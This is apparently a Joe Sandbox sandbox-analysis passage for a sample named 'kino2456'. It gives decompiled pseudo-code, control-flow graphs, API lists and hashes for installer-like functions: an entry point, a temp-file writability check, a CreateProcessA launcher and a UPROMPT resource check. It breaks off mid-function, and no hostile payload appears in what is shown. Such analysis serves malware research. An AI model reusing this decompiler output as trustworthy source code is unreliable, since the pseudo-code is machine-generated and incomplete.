                                                                                                                                                                                                                                    control_flow_graph 533 966a60-966a91 call 967155 call 967208 GetStartupInfoW 539 966a93-966aa2 533->539 540 966aa4-966aa6 539->540 541 966abc-966abe 539->541 542 966aaf-966aba Sleep 540->542 543 966aa8-966aad 540->543 544 966abf-966ac5 541->544 542->539 543->544 545 966ac7-966acf _amsg_exit 544->545 546 966ad1-966ad7 544->546 547 966b0b-966b11 545->547 548 966b05 546->548 549 966ad9-966ae9 call 966c3f 546->549 550 966b13-966b24 _initterm 547->550 551 966b2e-966b30 547->551 548->547 555 966aee-966af2 549->555 550->551 553 966b32-966b39 551->553 554 966b3b-966b42 551->554 553->554 556 966b67-966b71 554->556 557 966b44-966b51 call 967060 554->557 555->547 558 966af4-966b00 555->558 561 966b74-966b79 556->561 557->556 568 966b53-966b65 557->568 559 966c39-966c3e call 96724d 558->559 564 966bc5-966bc8 561->564 565 966b7b-966b7d 561->565 569 966bd6-966be3 _ismbblead 564->569 570 966bca-966bd3 564->570 566 966b94-966b98 565->566 567 966b7f-966b81 565->567 573 966ba0-966ba2 566->573 574 966b9a-966b9e 566->574 567->564 572 966b83-966b85 567->572 568->556 575 966be5-966be6 569->575 576 966be9-966bed 569->576 570->569 572->566 578 966b87-966b8a 572->578 579 966ba3-966bbc call 962bfb 573->579 574->579 575->576 576->561 577 966c1e-966c25 576->577 583 966c27-966c2d _cexit 577->583 584 966c32 577->584 578->566 581 966b8c-966b92 578->581 579->577 586 966bbe-966bbf exit 579->586 581->572 583->584 584->559 586->564
                                                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int* _t25;
				signed int _t26;
				signed int _t29;
				int _t30;
				signed int _t37;
				signed char _t41;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				signed int _t58;
				signed int _t59;
				intOrPtr* _t60;
				void* _t62;
				void* _t67;
				void* _t68;

				E00967155();
				_push(0x58);
				_push(0x9672b8);
				E00967208(__ebx, __edi, __esi);
				 *(_t62 - 0x20) = 0;
				GetStartupInfoW(_t62 - 0x68);
				 *((intOrPtr*)(_t62 - 4)) = 0;
				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
				_t53 = 0;
				while(1) {
					asm("lock cmpxchg [edx], ecx");
					if(0 == 0) {
						break;
					}
					if(0 != _t56) {
						Sleep(0x3e8);
						continue;
					} else {
						_t58 = 1;
						_t53 = 1;
					}
					L7:
					_t67 =  *0x9688b0 - _t58; // 0x2
					if(_t67 != 0) {
						__eflags =  *0x9688b0; // 0x2
						if(__eflags != 0) {
							 *0x9681e4 = _t58;
							goto L13;
						} else {
							 *0x9688b0 = _t58;
							_t37 = E00966C3F(0x9610b8, 0x9610c4); // executed
							__eflags = _t37;
							if(__eflags == 0) {
								goto L13;
							} else {
								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
								_t30 = 0xff;
							}
						}
					} else {
						_push(0x1f);
						L00966FF4();
						L13:
						_t68 =  *0x9688b0 - _t58; // 0x2
						if(_t68 == 0) {
							_push(0x9610b4);
							_push(0x9610ac);
							L00967202();
							 *0x9688b0 = 2;
						}
						if(_t53 == 0) {
							 *0x9688ac = 0;
						}
						_t71 =  *0x9688b4;
						if( *0x9688b4 != 0 && E00967060(_t71, 0x9688b4) != 0) {
							_t60 =  *0x9688b4; // 0x0
							 *0x96a288(0, 2, 0);
							 *_t60();
						}
						_t25 = __imp___acmdln; // 0x74895b9c
						_t59 =  *_t25;
						 *(_t62 - 0x1c) = _t59;
						_t54 =  *(_t62 - 0x20);
						while(1) {
							_t41 =  *_t59;
							if(_t41 > 0x20) {
								goto L32;
							}
							if(_t41 != 0) {
								if(_t54 != 0) {
									goto L32;
								} else {
									while(_t41 != 0 && _t41 <= 0x20) {
										_t59 = _t59 + 1;
										 *(_t62 - 0x1c) = _t59;
										_t41 =  *_t59;
									}
								}
							}
							__eflags =  *(_t62 - 0x3c) & 0x00000001;
							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
								_t29 = 0xa;
							} else {
								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
							}
							_push(_t29);
							_t30 = E00962BFB(0x960000, 0, _t59); // executed
							 *0x9681e0 = _t30;
							__eflags =  *0x9681f8;
							if( *0x9681f8 == 0) {
								exit(_t30); // executed
								goto L32;
							}
							__eflags =  *0x9681e4;
							if( *0x9681e4 == 0) {
								__imp___cexit();
								_t30 =  *0x9681e0; // 0x0
							}
							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
							goto L40;
							L32:
							__eflags = _t41 - 0x22;
							if(_t41 == 0x22) {
								__eflags = _t54;
								_t15 = _t54 == 0;
								__eflags = _t15;
								_t54 = 0 | _t15;
								 *(_t62 - 0x20) = _t54;
							}
							_t26 = _t41 & 0x000000ff;
							__imp___ismbblead(_t26);
							__eflags = _t26;
							if(_t26 != 0) {
								_t59 = _t59 + 1;
								__eflags = _t59;
								 *(_t62 - 0x1c) = _t59;
							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0096724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}


















                                                                                                                                                                                                                                    0x00966a60
                                                                                                                                                                                                                                    0x00966a6a
                                                                                                                                                                                                                                    0x00966a6c
                                                                                                                                                                                                                                    0x00966a71
                                                                                                                                                                                                                                    0x00966a78
                                                                                                                                                                                                                                    0x00966a7f
                                                                                                                                                                                                                                    0x00966a85
                                                                                                                                                                                                                                    0x00966a8e
                                                                                                                                                                                                                                    0x00966a91
                                                                                                                                                                                                                                    0x00966a93
                                                                                                                                                                                                                                    0x00966a9c
                                                                                                                                                                                                                                    0x00966aa2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966aa6
                                                                                                                                                                                                                                    0x00966ab4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966aa8
                                                                                                                                                                                                                                    0x00966aaa
                                                                                                                                                                                                                                    0x00966aab
                                                                                                                                                                                                                                    0x00966aab
                                                                                                                                                                                                                                    0x00966abf
                                                                                                                                                                                                                                    0x00966abf
                                                                                                                                                                                                                                    0x00966ac5
                                                                                                                                                                                                                                    0x00966ad1
                                                                                                                                                                                                                                    0x00966ad7
                                                                                                                                                                                                                                    0x00966b05
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966ad9
                                                                                                                                                                                                                                    0x00966ad9
                                                                                                                                                                                                                                    0x00966ae9
                                                                                                                                                                                                                                    0x00966af0
                                                                                                                                                                                                                                    0x00966af2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966af4
                                                                                                                                                                                                                                    0x00966af4
                                                                                                                                                                                                                                    0x00966afb
                                                                                                                                                                                                                                    0x00966afb
                                                                                                                                                                                                                                    0x00966af2
                                                                                                                                                                                                                                    0x00966ac7
                                                                                                                                                                                                                                    0x00966ac7
                                                                                                                                                                                                                                    0x00966ac9
                                                                                                                                                                                                                                    0x00966b0b
                                                                                                                                                                                                                                    0x00966b0b
                                                                                                                                                                                                                                    0x00966b11
                                                                                                                                                                                                                                    0x00966b13
                                                                                                                                                                                                                                    0x00966b18
                                                                                                                                                                                                                                    0x00966b1d
                                                                                                                                                                                                                                    0x00966b24
                                                                                                                                                                                                                                    0x00966b24
                                                                                                                                                                                                                                    0x00966b30
                                                                                                                                                                                                                                    0x00966b39
                                                                                                                                                                                                                                    0x00966b39
                                                                                                                                                                                                                                    0x00966b3b
                                                                                                                                                                                                                                    0x00966b42
                                                                                                                                                                                                                                    0x00966b57
                                                                                                                                                                                                                                    0x00966b5f
                                                                                                                                                                                                                                    0x00966b65
                                                                                                                                                                                                                                    0x00966b65
                                                                                                                                                                                                                                    0x00966b67
                                                                                                                                                                                                                                    0x00966b6c
                                                                                                                                                                                                                                    0x00966b6e
                                                                                                                                                                                                                                    0x00966b71
                                                                                                                                                                                                                                    0x00966b74
                                                                                                                                                                                                                                    0x00966b74
                                                                                                                                                                                                                                    0x00966b79
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966b7d
                                                                                                                                                                                                                                    0x00966b81
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966b83
                                                                                                                                                                                                                                    0x00966b8c
                                                                                                                                                                                                                                    0x00966b8d
                                                                                                                                                                                                                                    0x00966b90
                                                                                                                                                                                                                                    0x00966b90
                                                                                                                                                                                                                                    0x00966b83
                                                                                                                                                                                                                                    0x00966b81
                                                                                                                                                                                                                                    0x00966b94
                                                                                                                                                                                                                                    0x00966b98
                                                                                                                                                                                                                                    0x00966ba2
                                                                                                                                                                                                                                    0x00966b9a
                                                                                                                                                                                                                                    0x00966b9a
                                                                                                                                                                                                                                    0x00966b9a
                                                                                                                                                                                                                                    0x00966ba3
                                                                                                                                                                                                                                    0x00966bab
                                                                                                                                                                                                                                    0x00966bb0
                                                                                                                                                                                                                                    0x00966bb5
                                                                                                                                                                                                                                    0x00966bbc
                                                                                                                                                                                                                                    0x00966bbf
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966bbf
                                                                                                                                                                                                                                    0x00966c1e
                                                                                                                                                                                                                                    0x00966c25
                                                                                                                                                                                                                                    0x00966c27
                                                                                                                                                                                                                                    0x00966c2d
                                                                                                                                                                                                                                    0x00966c2d
                                                                                                                                                                                                                                    0x00966c32
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00966bc5
                                                                                                                                                                                                                                    0x00966bc5
                                                                                                                                                                                                                                    0x00966bc8
                                                                                                                                                                                                                                    0x00966bcc
                                                                                                                                                                                                                                    0x00966bce
                                                                                                                                                                                                                                    0x00966bce
                                                                                                                                                                                                                                    0x00966bd1
                                                                                                                                                                                                                                    0x00966bd3
                                                                                                                                                                                                                                    0x00966bd3
                                                                                                                                                                                                                                    0x00966bd6
                                                                                                                                                                                                                                    0x00966bda
                                                                                                                                                                                                                                    0x00966be1
                                                                                                                                                                                                                                    0x00966be3
                                                                                                                                                                                                                                    0x00966be5
                                                                                                                                                                                                                                    0x00966be5
                                                                                                                                                                                                                                    0x00966be6
                                                                                                                                                                                                                                    0x00966be6
                                                                                                                                                                                                                                    0x00966be9
                                                                                                                                                                                                                                    0x00966bea
                                                                                                                                                                                                                                    0x00966bea
                                                                                                                                                                                                                                    0x00966b74
                                                                                                                                                                                                                                    0x00966c39
                                                                                                                                                                                                                                    0x00966c3e
                                                                                                                                                                                                                                    0x00966c3e
                                                                                                                                                                                                                                    0x00966abe
                                                                                                                                                                                                                                    0x00966abe
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00967155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00967182
                                                                                                                                                                                                                                      • Part of subcall function 00967155: GetCurrentProcessId.KERNEL32 ref: 00967191
                                                                                                                                                                                                                                      • Part of subcall function 00967155: GetCurrentThreadId.KERNEL32 ref: 0096719A
                                                                                                                                                                                                                                      • Part of subcall function 00967155: GetTickCount.KERNEL32 ref: 009671A3
                                                                                                                                                                                                                                      • Part of subcall function 00967155: QueryPerformanceCounter.KERNEL32(?), ref: 009671B8
                                                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,009672B8,00000058), ref: 00966A7F
                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00966AB4
                                                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 00966AC9
                                                                                                                                                                                                                                    • _initterm.MSVCRT ref: 00966B1D
                                                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00966B49
                                                                                                                                                                                                                                    • exit.KERNELBASE ref: 00966BBF
                                                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 00966BDA
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                                                    • Opcode ID: f7af2f3b8b96dd6e609bde5f099c7b299fbac493d3b9355adc81a1ca50179d7f
                                                                                                                                                                                                                                    • Instruction ID: 66ef24cd8b186e52b15c3c60c1ffb0dfd40e9731bf7de93964ced650478e8ee3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f7af2f3b8b96dd6e609bde5f099c7b299fbac493d3b9355adc81a1ca50179d7f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F41EF3095C325DFDB219FB8DD1576A7BE8EB85764F64021EE861E3290CFB488419B80
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009658C8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 74memoryfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 587 9658c8-9658d5 588 9658d8-9658dd 587->588 588->588 589 9658df-9658f1 LocalAlloc 588->589 590 9658f3-965901 call 9644b9 589->590 591 965919-965959 call 961680 call 96658a CreateFileA LocalFree 589->591 595 965906-965910 call 966285 590->595 591->595 601 96595b-96596c CloseHandle GetFileAttributesA 591->601 600 965912-965918 595->600 601->595 602 96596e-965970 601->602 602->595 603 965972-96597b 602->603 603->600
                                                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                                                    			E009658C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do {
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14;
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
				if(_t20 != 0) {
					E00961680(_t20, _t36, _t33);
					E0096658A(_t20, _t36, "TMP4351$.TMP");
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) {
						goto L4;
					} else {
						CloseHandle(_t12);
						_t16 = GetFileAttributesA(_t33); // executed
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x969124 = 0;
							_t14 = 1;
						}
					}
				} else {
					E009644B9(0, 0x4b5, 0, 0, 0x10, 0);
					L4:
					 *0x969124 = E00966285();
					_t14 = 0;
				}
				return _t14;
			}













                                                                                                                                                                                                                                    0x009658cd
                                                                                                                                                                                                                                    0x009658d1
                                                                                                                                                                                                                                    0x009658d3
                                                                                                                                                                                                                                    0x009658d5
                                                                                                                                                                                                                                    0x009658d8
                                                                                                                                                                                                                                    0x009658d8
                                                                                                                                                                                                                                    0x009658da
                                                                                                                                                                                                                                    0x009658db
                                                                                                                                                                                                                                    0x009658e1
                                                                                                                                                                                                                                    0x009658ed
                                                                                                                                                                                                                                    0x009658f1
                                                                                                                                                                                                                                    0x0096591e
                                                                                                                                                                                                                                    0x0096592c
                                                                                                                                                                                                                                    0x00965943
                                                                                                                                                                                                                                    0x0096594a
                                                                                                                                                                                                                                    0x0096594d
                                                                                                                                                                                                                                    0x00965953
                                                                                                                                                                                                                                    0x00965959
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096595b
                                                                                                                                                                                                                                    0x0096595c
                                                                                                                                                                                                                                    0x00965963
                                                                                                                                                                                                                                    0x0096596c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965972
                                                                                                                                                                                                                                    0x00965974
                                                                                                                                                                                                                                    0x0096597a
                                                                                                                                                                                                                                    0x0096597a
                                                                                                                                                                                                                                    0x0096596c
                                                                                                                                                                                                                                    0x009658f3
                                                                                                                                                                                                                                    0x00965901
                                                                                                                                                                                                                                    0x00965906
                                                                                                                                                                                                                                    0x0096590b
                                                                                                                                                                                                                                    0x00965910
                                                                                                                                                                                                                                    0x00965910
                                                                                                                                                                                                                                    0x00965918

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 009658E7
                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965943
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096594D
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 0096595C
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP002.TMP\,?,00965534,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP002.TMP\,00000000), ref: 00965963
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                    • API String ID: 747627703-188559970
                                                                                                                                                                                                                                    • Opcode ID: 175e38c6ff3f03d66feb22e5e6d4228eeba55915a0d385c9e0e0ebc6591f8f30
                                                                                                                                                                                                                                    • Instruction ID: fe42c8192252d91cf52d9d7275d68c2491f649702f510029b7148ddae626d57b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 175e38c6ff3f03d66feb22e5e6d4228eeba55915a0d385c9e0e0ebc6591f8f30
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91113471618220ABC7201F79AC0DB9B7E9DDF863B4F11061DF50AE32D1CEB08C45D6A0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 00963FEF Relevance: 10.6, APIs: 7, Instructions: 97processsynchronizationwindowCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 631 963fef-964010 632 964016-96403b CreateProcessA 631->632 633 96410a-96411a call 966ce0 631->633 634 9640c4-964101 call 966285 GetLastError FormatMessageA call 9644b9 632->634 635 964041-96406e WaitForSingleObject GetExitCodeProcess 632->635 647 964106 634->647 638 964070-964077 635->638 639 964091 call 96411b 635->639 638->639 642 964079-96407b 638->642 646 964096-9640b8 CloseHandle * 2 639->646 642->639 645 96407d-964089 642->645 645->639 648 96408b 645->648 649 9640ba-9640c0 646->649 650 964108 646->650 647->650 648->639 649->650 651 9640c2 649->651 650->633 651->647
                                                                                                                                                                                                                                    C-Code - Quality: 84%
                                                                                                                                                                                                                                    			E00963FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
				signed int _v8;
				char _v524;
				long _v528;
				struct _PROCESS_INFORMATION _v544;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t20;
				void* _t22;
				int _t25;
				intOrPtr* _t39;
				signed int _t44;
				void* _t49;
				signed int _t50;
				intOrPtr _t53;

				_t45 = __edx;
				_t20 =  *0x968004; // 0xf4cc89a0
				_v8 = _t20 ^ _t50;
				_t39 = __ecx;
				_t49 = 1;
				_t22 = 0;
				if(__ecx == 0) {
					L13:
					return E00966CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
				if(_t25 == 0) {
					 *0x969124 = E00966285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
					_t45 = 0x4c4;
					E009644B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
					L11:
					_t49 = 0;
					L12:
					_t22 = _t49;
					goto L13;
				}
				WaitForSingleObject(_v544.hProcess, 0xffffffff);
				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
				_t44 = _v528;
				_t53 =  *0x968a28; // 0x0
				if(_t53 == 0) {
					_t34 =  *0x969a2c; // 0x0
					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
						_t34 = _t44 & 0xff000000;
						if((_t44 & 0xff000000) == 0xaa000000) {
							 *0x969a2c = _t44;
						}
					}
				}
				E0096411B(_t34, _t44);
				CloseHandle(_v544.hThread);
				CloseHandle(_v544);
				if(( *0x969a34 & 0x00000400) == 0 || _v528 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}


















                                                                                                                                                                                                                                    0x00963fef
                                                                                                                                                                                                                                    0x00963ffa
                                                                                                                                                                                                                                    0x00964001
                                                                                                                                                                                                                                    0x00964008
                                                                                                                                                                                                                                    0x0096400a
                                                                                                                                                                                                                                    0x0096400b
                                                                                                                                                                                                                                    0x00964010
                                                                                                                                                                                                                                    0x0096410a
                                                                                                                                                                                                                                    0x0096411a
                                                                                                                                                                                                                                    0x0096411a
                                                                                                                                                                                                                                    0x0096401c
                                                                                                                                                                                                                                    0x0096401d
                                                                                                                                                                                                                                    0x0096401e
                                                                                                                                                                                                                                    0x0096401f
                                                                                                                                                                                                                                    0x00964033
                                                                                                                                                                                                                                    0x0096403b
                                                                                                                                                                                                                                    0x009640ca
                                                                                                                                                                                                                                    0x009640e9
                                                                                                                                                                                                                                    0x009640f8
                                                                                                                                                                                                                                    0x00964101
                                                                                                                                                                                                                                    0x00964106
                                                                                                                                                                                                                                    0x00964106
                                                                                                                                                                                                                                    0x00964108
                                                                                                                                                                                                                                    0x00964108
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00964108
                                                                                                                                                                                                                                    0x00964049
                                                                                                                                                                                                                                    0x0096405c
                                                                                                                                                                                                                                    0x00964062
                                                                                                                                                                                                                                    0x00964068
                                                                                                                                                                                                                                    0x0096406e
                                                                                                                                                                                                                                    0x00964070
                                                                                                                                                                                                                                    0x00964077
                                                                                                                                                                                                                                    0x0096407f
                                                                                                                                                                                                                                    0x00964089
                                                                                                                                                                                                                                    0x0096408b
                                                                                                                                                                                                                                    0x0096408b
                                                                                                                                                                                                                                    0x00964089
                                                                                                                                                                                                                                    0x00964077
                                                                                                                                                                                                                                    0x00964091
                                                                                                                                                                                                                                    0x0096409c
                                                                                                                                                                                                                                    0x009640a8
                                                                                                                                                                                                                                    0x009640b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009640c2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009640c2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateProcessA.KERNELBASE ref: 00964033
                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00964049
                                                                                                                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 0096405C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0096409C
                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 009640A8
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 009640DC
                                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 009640E9
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3183975587-0
                                                                                                                                                                                                                                    • Opcode ID: 8b92da13b9c914a12f4fa48cb932d453d538db40906f8c75d65ba15ddccb3e3e
                                                                                                                                                                                                                                    • Instruction ID: a3adff1334992a1a8a1294b14e48fd22c1374a89789ae8e8cbad8e08f5492e26
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8b92da13b9c914a12f4fa48cb932d453d538db40906f8c75d65ba15ddccb3e3e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1531D131658218BBEB209FA5DC49FAB77BCEBA6710F1001ADF605E21A0CA704C85DF61
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 009651E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 652 9651e5-96520b call 96468f LocalAlloc 655 96522d-96523c call 96468f 652->655 656 96520d-965228 call 9644b9 call 966285 652->656 661 965262-965270 lstrcmpA 655->661 662 96523e-965260 call 9644b9 LocalFree 655->662 671 9652b0 656->671 665 965272-965273 LocalFree 661->665 666 96527e-96529c call 9644b9 LocalFree 661->666 662->671 669 965279-96527c 665->669 674 9652a6 666->674 675 96529e-9652a4 666->675 672 9652b2-9652b5 669->672 671->672 674->671 675->669
                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E009651E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E0096468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E0096468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E009644B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x969124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x969124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
